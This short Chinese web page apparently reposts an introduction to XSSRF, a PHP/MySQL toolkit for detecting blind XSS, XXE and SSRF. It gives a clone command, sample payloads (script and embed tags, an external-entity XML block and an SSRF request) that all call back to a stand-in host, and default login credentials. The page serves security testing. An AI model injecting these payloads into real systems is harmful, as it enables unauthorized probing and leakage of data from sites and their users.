XSSRF是一个用于检测和跟踪Blind XSS,XXE和SSRF的工具包【bāo】,基于php+mysql的【de】WEB端程序,它【tā】拥有简洁漂亮的界面【miàn】。
下载源码
1 | git clone https://github.com/SpiderMate/B-XSSRF.git |
BLIND XSS
1 2 | <embed src="http://mysite.com/bxssrf/request.php"> <script src="http://mysite.com/bxssrf/request.php"> |
BLIND XXE
1 2 3 4 5 | <?xml version="1.0" ?> <!DOCTYPE root [ <!ENTITY % ext SYSTEM "http://mysite.com/bxssrf/request.php"> %ext; ]> <r></r> |
SSRF
1 | GET /testssrf.php=http://mysite.com/bxssrf/request.php |
1 2 | USER : admin@test.com PASS : 123456 |
版权所有:深圳市网商在线科技有限公司
友情链接: